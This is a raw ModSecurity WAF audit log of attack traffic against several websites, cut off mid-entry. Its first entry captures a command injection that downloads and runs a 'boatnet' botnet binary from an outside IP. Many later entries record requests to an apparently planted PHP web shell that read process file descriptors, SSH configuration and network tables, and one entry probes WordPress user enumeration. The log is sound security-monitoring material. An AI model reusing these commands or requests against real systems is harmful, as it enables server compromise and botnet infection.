/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.111%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 144.172.103.59 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 Cookie: uid=1 --55e3a414-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --55e3a414-E-- --55e3a414-H-- Message: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/modsecurity.d/rules/comodo_free/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||198.71.51.75|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/modsecurity.d/rules/comodo_free/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||198.71.51.75|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] [hostname "198.71.51.75"] [uri "/device.rsp"] [unique_id "aFBomH8PxMRZ7s11niQHjQAAAAI"] Stopwatch: 1750100120568016 5922 (- - -) Stopwatch2: 1750100120568016 5922; combined=4419, p1=643, p2=3635, p3=36, p4=33, p5=72, sr=202, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --55e3a414-Z-- --d2fafe17-A-- [17/Jun/2025:00:25:28.550435 +0530] aFBooJlL5_2Zd8wUdfLGzAAAAAg 52.2.83.227 50746 127.0.0.1 7081 --d2fafe17-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/32 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.2.83.227 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --d2fafe17-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --d2fafe17-H-- Message: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/32"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/32"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBooJlL5_2Zd8wUdfLGzAAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100128546225 4272 (- - -) Stopwatch2: 1750100128546225 4272; combined=2252, p1=382, p2=1751, p3=37, p4=27, p5=55, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2fafe17-Z-- --33303732-A-- [17/Jun/2025:00:25:40.838794 +0530] aFBorBwcFb_n1P0IC9xjLAAAAAo 52.7.13.143 52288 127.0.0.1 7081 --33303732-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/126 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.7.13.143 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --33303732-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --33303732-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/126"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/126"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBorBwcFb_n1P0IC9xjLAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100140834342 4503 (- - -) Stopwatch2: 1750100140834342 4503; combined=2432, p1=476, p2=1834, p3=37, p4=29, p5=55, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33303732-Z-- --e1022d6d-A-- [17/Jun/2025:00:25:44.602957 +0530] aFBosFJfblPUQiSn5r1fcgAAAAA 54.197.102.71 52670 127.0.0.1 7081 --e1022d6d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/44 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.197.102.71 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e1022d6d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --e1022d6d-H-- Message: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/44"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/44"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBosFJfblPUQiSn5r1fcgAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100144598571 4445 (- - -) Stopwatch2: 1750100144598571 4445; combined=2440, p1=374, p2=1933, p3=48, p4=29, p5=56, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1022d6d-Z-- --b8d46b5d-A-- [17/Jun/2025:00:26:26.964863 +0530] aFBo2hwcFb_n1P0IC9xjRwAAAAo 143.244.57.86 40652 127.0.0.1 7081 --b8d46b5d-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 143.244.57.86 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --b8d46b5d-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --b8d46b5d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFBo2hwcFb_n1P0IC9xjRwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750100186030607 934329 (- - -) Stopwatch2: 1750100186030607 934329; combined=1609, p1=293, p2=1232, p3=0, p4=0, p5=84, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b8d46b5d-Z-- --3d2af738-A-- [17/Jun/2025:00:26:36.124370 +0530] aFBo5H3hoSwVUy254pHyOgAAACQ 216.73.216.71 36834 127.0.0.1 7081 --3d2af738-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d%2Fssh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3d2af738-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4125 Connection: close Content-Type: text/html; charset=UTF-8 --3d2af738-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBo5H3hoSwVUy254pHyOgAAACQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBo5H3hoSwVUy254pHyOgAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100196119974 4473 (- - -) Stopwatch2: 1750100196119974 4473; combined=2119, p1=344, p2=1621, p3=37, p4=30, p5=87, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3d2af738-Z-- --42c27365-A-- [17/Jun/2025:00:26:40.748476 +0530] aFBo6FJfblPUQiSn5r1fnAAAAAA 52.21.62.139 36650 127.0.0.1 7081 --42c27365-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/148 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.21.62.139 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --42c27365-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --42c27365-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/148"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/148"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBo6FJfblPUQiSn5r1fnAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100200744583 3972 (- - -) Stopwatch2: 1750100200744583 3972; combined=2069, p1=451, p2=1476, p3=33, p4=26, p5=83, sr=204, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --42c27365-Z-- --ca3e4f70-A-- [17/Jun/2025:00:27:08.787259 +0530] aFBpBB6Azi2u_ik2Q3KnJwAAAAY 3.217.171.106 43962 127.0.0.1 7081 --ca3e4f70-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/46 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.217.171.106 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --ca3e4f70-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --ca3e4f70-H-- Message: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/46"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/46"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpBB6Azi2u_ik2Q3KnJwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100228781919 5404 (- - -) Stopwatch2: 1750100228781919 5404; combined=2951, p1=404, p2=2386, p3=45, p4=38, p5=78, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ca3e4f70-Z-- --00f1cd62-A-- [17/Jun/2025:00:27:32.090587 +0530] aFBpHH8PxMRZ7s11niQH-AAAAAI 216.73.216.71 48280 127.0.0.1 7081 --00f1cd62-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2FZ99-cloudinit-warnings.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --00f1cd62-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3387 Connection: close Content-Type: text/html; charset=UTF-8 --00f1cd62-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/z99-cloudinit-warnings.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpHH8PxMRZ7s11niQH-AAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/z99-cloudinit-warnings.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpHH8PxMRZ7s11niQH-AAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100252086327 4333 (- - -) Stopwatch2: 1750100252086327 4333; combined=2415, p1=378, p2=1838, p3=39, p4=32, p5=128, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00f1cd62-Z-- --b1003c00-A-- [17/Jun/2025:00:28:30.462484 +0530] aFBpVk3CmevS3xeTzmohhAAAAAQ 216.73.216.71 58612 127.0.0.1 7081 --b1003c00-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fsnapd%2Fcurrent%2Fetc%2Fprofile.d&viewfile=%2F%2Fsnap%2Fsnapd%2Fcurrent%2Fetc%2Fprofile.d%2Fapps-bin-path.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b1003c00-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3377 Connection: close Content-Type: text/html; charset=UTF-8 --b1003c00-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /snap/snapd/current/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /snap/snapd/current/etc/profile.d/apps-bin-path.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /snap/snapd/current/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpVk3CmevS3xeTzmohhAAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /snap/snapd/current/etc/profile.d/apps-bin-path.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpVk3CmevS3xeTzmohhAAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100310458067 4471 (- - -) Stopwatch2: 1750100310458067 4471; combined=2303, p1=368, p2=1778, p3=37, p4=30, p5=90, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b1003c00-Z-- --82ab6220-A-- [17/Jun/2025:00:29:06.567724 +0530] aFBpeiid3pHxA3RhGpzooAAAAAk 216.73.216.71 41438 127.0.0.1 7081 --82ab6220-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fssh&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fssh%2Fsshd_config.ucf-dist HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --82ab6220-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4433 Connection: close Content-Type: text/html; charset=UTF-8 --82ab6220-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:viewfile: /proc/self/root/etc/ssh/sshd_config.ucf-dist"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:viewfile: /proc/self/root/etc/ssh/sshd_config.ucf-dist"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpeiid3pHxA3RhGpzooAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100346563485 4294 (- - -) Stopwatch2: 1750100346563485 4294; combined=2112, p1=322, p2=1661, p3=37, p4=36, p5=56, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82ab6220-Z-- --24c85833-A-- [17/Jun/2025:00:29:10.301833 +0530] aFBpfpVkCcfT-Z8NQYyTTwAAAAc 216.73.216.71 53382 127.0.0.1 7081 --24c85833-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet%2Ftcp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --24c85833-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 6285 Connection: close Content-Type: text/html; charset=UTF-8 --24c85833-H-- Message: Warning. Matched phrase "proc/net/tcp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/tcp found within ARGS:viewfile: /proc/self/root/proc/net/tcp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/tcp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg 